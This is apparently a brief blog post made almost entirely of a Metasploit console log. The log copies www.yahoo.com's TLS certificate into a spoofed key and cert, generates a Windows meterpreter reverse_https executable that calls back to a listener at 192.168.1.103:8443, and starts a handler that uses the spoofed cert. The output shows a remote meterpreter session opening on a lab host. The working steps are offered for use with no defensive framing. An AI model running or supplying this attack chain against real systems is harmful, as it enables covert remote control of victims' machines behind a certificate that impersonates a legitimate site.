Metasploit - reverse_https

2015-11-17 10:39

msf auxiliary(impersonate_ssl) > show options

Module options (auxiliary/gather/impersonate_ssl):

Name              Current Setting  Required  Description
----              ---------------  --------  -----------
ADD_CN                             no        Add CN to match spoofed site name (e.g. *.example.com)
CA_CERT                            no        CA Public certificate
EXPIRATION                         no        Date the new cert should expire (e.g. 06 May 2012, YESTERDAY or NOW)
OUT_FORMAT        PEM              yes       Output format (Accepted: DER, PEM)
PRIVKEY                            no        Sign the cert with your own CA private key
PRIVKEY_PASSWORD                   no        Password for private key specified in PRIV_KEY (if applicable)
RHOST                              yes       The target address
RPORT             443              yes       The target port

msf auxiliary(impersonate_ssl) > set RHOST www.yahoo.com
RHOST => www.yahoo.com
msf auxiliary(impersonate_ssl) > run

[*] Connecting to www.yahoo.com:443
[*] Copying certificate from www.yahoo.com:443
/C=US/ST=California/L=Sunnyvale/O=Yahoo Inc./OU=Information Technology/CN=www.yahoo.com
[*] Beginning export of certificate files
[*] Creating looted key/crt/pem files for www.yahoo.com:443
[+] key: /home/notfound/.msf4/loot/20151117022203_default_116.214.12.74_www.yahoo.com_ke_612544.key
[+] crt: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_ce_987985.crt
[+] pem: /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
[*] Auxiliary module execution completed


msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf payload(reverse_https) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf payload(reverse_https) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf payload(reverse_https) > set LPORT 8443
LPORT => 8443
msf payload(reverse_https) > generate -t exe -f /tmp/https.exe -p x86
[*] Writing 73802 bytes to /tmp/https.exe...


msf payload(reverse_https) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
HANDLERSSLCERT => /home/notfound/.msf4/loot/20151117022204_default_116.214.12.74_www.yahoo.com_pe_902367.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
STAGERVERIFYSSLCERT => true
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://0.0.0.0:8443/
msf exploit(handler) > [*] Starting the payload handler...

msf exploit(handler) >
[*] 192.168.1.106:1432 (UUID: 0d7dc065ab206136/x86=1/windows=1/2015-11-17T02:28:16Z) Staging Native payload ...
[*] Meterpreter will verify SSL Certificate with SHA1 hash 9ce474cb2ec1122d77e05dc20f89a9c03266dd81
[*] Meterpreter session 1 opened (192.168.1.103:8443 -> 192.168.1.106:1432) at 2015-11-17 02:28:20 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >


References

http://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation